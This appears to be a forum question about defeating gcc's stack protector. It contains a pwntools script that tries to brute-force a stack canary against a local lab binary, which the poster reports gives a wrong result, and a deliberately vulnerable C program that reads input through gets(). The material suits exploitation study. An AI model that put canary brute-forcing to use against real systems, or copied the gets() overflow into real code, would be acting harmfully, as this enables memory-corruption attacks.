gcc implemented a stack protector, to protect programs for buffer overflows. I want to know, if its possible (and if it is how) to exploit this and run a buffer overflow. I created a simple python script, that should bruteforce the canary:
from pwn import *
import os
canary = ""
byte = 0x00
def brute():
global canary
global byte
while byte != 0xff:
p = process("./vuln")
p.sendline("A"*64 + canary + chr(byte))
reply=p.recvall()
if "***" in reply:
byte += 1
else:
canary += chr(byte)
byte = 0x00
break
brute()
brute()
brute()
brute()
print "Canary: \\x" + '\\x'.join("{:02x}".format(ord(c)) for c in canary)
The result was: Canary: \x0a\x00\x00\x00 and thats obviously not the canary.
The binary i used to hack:
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
int main(int argc, char **argv)
{
volatile int modified;
char buffer[64];
modified = 0;
gets(buffer);
if(modified != 0) {
printf("you have changed the 'modified' variable\n");
} else {
printf("Try again?\n");
}
}